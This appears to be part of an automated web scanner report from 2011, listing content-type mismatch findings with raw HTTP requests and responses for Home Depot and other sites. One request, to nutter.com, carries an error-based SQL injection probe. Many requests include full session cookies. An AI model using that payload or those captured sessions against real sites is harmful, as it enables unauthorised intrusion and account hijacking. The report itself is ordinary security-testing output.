Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 19 May 2010 16:11:09 GMT
ETag: "17b84c-44-b4b8e140"
Accept-Ranges: bytes
Content-Length: 68
Content-Type: image/png
Cache-Control: max-age=37845
Date: Thu, 16 Jun 2011 11:27:09 GMT
Connection: close

GIF89a.............!.......,.............................H......b..;

24.35. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_email.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/icon_email.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /wcsstore/hdus/en_US/images/layout/icon_email.gif HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay?langId=-1&storeId=10051&catalogId=10053&productId=202642971&R=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Fri, 21 May 2010 02:12:09 GMT
ETag: "1af938-98-37e83040"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Cache-Control: max-age=18178
Date: Thu, 16 Jun 2011 11:35:41 GMT
Connection: close

.PNG
.
...IHDR.............|..m....tEXtSoftware.Adobe ImageReadyq.e<....PLTE....x..D.....(IDATx.b`@......E.........bD.a..r..A...........R....IEND.B`.

24.36. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_print.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/icon_print.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /wcsstore/hdus/en_US/images/layout/icon_print.gif HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay?langId=-1&storeId=10051&catalogId=10053&productId=202642971&R=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Fri, 21 May 2010 02:12:09 GMT
ETag: "1af949-39f-37e83040"
Accept-Ranges: bytes
Content-Length: 927
Content-Type: image/gif
Cache-Control: max-age=18070
Date: Thu, 16 Jun 2011 11:35:41 GMT
Connection: close

.PNG
.
...IHDR.............|..m....tEXtSoftware.Adobe ImageReadyq.e<....PLTE....x......................

............................................................ !!!"""###$$$%%%&&&'''((
...[SNIP]...

24.37. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/orange-square.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /wcsstore/hdus/en_US/images/layout/orange-square.png HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556319&langId=-1&catalogId=10053&cm_sp=outdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers&locStoreNum=2583
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; FSRCookie=ForeseeLoyalty=2; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; THD_PERSIST=C4%3D2583%2BNE%20Washington%20DC%20-%20%20Washington%2C%20DC%2B43%3A%3BC4_EXP%3D1360063600%3A%3BC5%3D7000000000002025830%3A%3BC5_EXP%3D1360063600%3A%3BC8%3D%3A%3BC8_EXP%3D1308310168%3A%3BC24%3D20018%3A%3BC24_EXP%3D1360063600%3A%3BC25%3Dccaita67%2FWC_THD2_ccaita67%2F1308223765492%3A%3BC25_EXP%3D1360063765%3A%3BC27%3D2583%2BNE%20Washington%20DC%20-%20%20Washington%2C%20DC%2B43%3A%3BC27_EXP%3D1360063600%3A%3BC33%3D2583%3A%3BC33_EXP%3D1360063600%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D1308310000; s_pers=%20s_campaign%3Dno%2520value%7C1308225568985%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225568988%3B%20p_30%3DSubcategory%7C1308225568991%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 19 May 2010 16:11:09 GMT
ETag: "17b807-2d-b4b8e140"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/png
Cache-Control: max-age=18453
Date: Thu, 16 Jun 2011 11:29:32 GMT
Connection: close

GIF89a........x....!.......,............. ..;

24.38. http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/styles/businessjs.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /wcsstore/hdus/en_US/styles/businessjs.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223600410%3a%3bC25%5fEXP%3d1360063600%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Tue, 26 Apr 2011 04:10:40 GMT
ETag: "fefe4-6083-81ccf000"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 24707
Cache-Control: max-age=21004
Date: Thu, 16 Jun 2011 11:26:44 GMT
Connection: close

/* Last updated 3:59m 04/21/2011 Aundrae Brown */

var fed_ipadurl = document.location.href;

// John Jimenez
// A simple flag to tell if we are in IE6
isIE6 = (jQuery.browser.msie && jQuery.b
...[SNIP]...

24.39. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemAddService

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 140
Expires: Thu, 16 Jun 2011 11:35:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:35:39 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224133796%3a%3bC25%5fEXP%3d1360064133%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:33 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227739722%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cYAeXFdjXVbkwxwNU3QRHbu8%2f1Ko%3d;Domain=.homedepot.com;Path=/

{"ItemsAdded":[],"ItemsAddFailure":[{"CatEntryId":"202642971","ProductName":"1","ErrorMessage":"No Inventory"}]}

24.40. http://www.ilslaunch.com/sites/all/themes/ils/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ilslaunch.com
Path:	/sites/all/themes/ils/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/ils/favicon.ico HTTP/1.1
Host: www.ilslaunch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8d393e05f9096e5159d3f1d85acb4aa2=663g8gh6rfesig5han0apvb014; has_js=1; __unam=ca8fce1-13098135017-1f1d1625-1; __utmz=163186660.1308221461.1.1.utmcsr=lightsquared.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=163186660.446830433.1308221461.1308221461.1308221461.1; __utmc=163186660; __utmb=163186660.1.10.1308221461; hubspotdt=2011-06-16%2006%3A51%3A00; hubspotutk=cd406f52b24f48799698eac3c68f3d6f; hubspotvd=cd406f52b24f48799698eac3c68f3d6f; hubspotvw=cd406f52b24f48799698eac3c68f3d6f; hubspotvm=cd406f52b24f48799698eac3c68f3d6f; hsfirstvisit=http%3A%2F%2Fwww.ilslaunch.com%2Fmission-control%2Fmission-skyterra-1|http%3A%2F%2Fwww.lightsquared.com%2F|2011-06-16%2006%3A51%3A00

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:51:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 20 Jan 2011 18:23:13 GMT
ETag: "3d48af4-47e-39fdc640"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=1209600
Expires: Thu, 30 Jun 2011 10:51:05 GMT
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ........................................................&^^^.lll....c...
................................................???.333.333.OOO...."......................
...[SNIP]...

24.41. http://www.lightsquared.com/wp-content/themes/lightsquared/css/type/titilliumtext22l004-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lightsquared.com
Path:	/wp-content/themes/lightsquared/css/type/titilliumtext22l004-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /wp-content/themes/lightsquared/css/type/titilliumtext22l004-webfont.woff HTTP/1.1
Host: www.lightsquared.com
Proxy-Connection: keep-alive
Referer: http://www.lightsquared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o8lr5d4di75ipopo7a9ll7olo7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:50:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 02 Jun 2011 21:39:03 GMT
ETag: "12e44d1-6080-4a4c1773d6bc0"
Accept-Ranges: bytes
Content-Length: 24704
Connection: close
Content-Type: text/plain; charset=UTF-8

wOFF......`.................................FFTM...l........[...GDEF........... ....OS/2.......M...`.tH~cmap............d#..cvt .......\...\....fpgm...........e../.gasp................glyf......R.....
...[SNIP]...

24.42. https://www.mavitunasecurity.com/support/checkupdate/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.mavitunasecurity.com
Path:	/support/checkupdate/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /support/checkupdate/ HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Fri, 17 Jun 2011 10:42:37 GMT

0.0.0.0

24.43. http://www.nutter.com/attorneys.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nutter.com
Path:	/attorneys.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

24.44. http://www.res-x.com/ws/r2/Resonance.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=273436009418219&sg=1&pg=177302947267889&bx=true&vr=2.69&sc=search_rr&cu=&ct=&no=3&cb=r1eh&level1=&clk=&ur=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation%3FNs%3DP_REP_PRC_MODE%257C1%26storeId%3D10051%26catalogId%3D10053%26langId%3D-1&plk=202040831;202585948;202585928;202585946;202518949;202196193;202585926;100660300;202882859;202518947;202670069;202585943;202585924;202040828;202642980;202585939;202562705;202585922;202585937;202585919;100606995;202520255;100660307;202642976;&rf=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Navigation%3FstoreId%3D10051%26categoryID%3D556319%26langId%3D-1%26catalogId%3D10053%26cm_sp%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%26locStoreNum%3D2583 HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5fp3hk554qr2d1455wlr4u45; NSC_wjq-ipnfefqpu=ffffffffc3a01e4845525d5f4f58455e445a4a423660

Response

24.45. http://www2.sesamestats.com/paneltracking.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www2.sesamestats.com
Path:	/paneltracking.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /paneltracking.aspx?bannerid=JBOLARetailnonCamp&BannerPos=dnt&BannerSite=www.anysite.com&CampaignId=JetBlue&mediaType=Banner&mediaSource=Internet HTTP/1.1
Host: www2.sesamestats.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308249152535&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "22ba9d43aa1d26928512e501f6a029a5:1267715541"
Last-Modified: Thu, 04 Mar 2010 15:12:21 GMT
Accept-Ranges: bytes
Content-Length: 58
Content-Type: image/gif
Date: Thu, 16 Jun 2011 18:32:36 GMT
Connection: close
X-N: S

BM:.......6...(...........................................

25. Content type is not specified previous next
There are 3 instances of this issue:

http://ads.bluelithium.com/st
http://ads.pointroll.com/PortalServe/
https://soundcloud.com/login

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

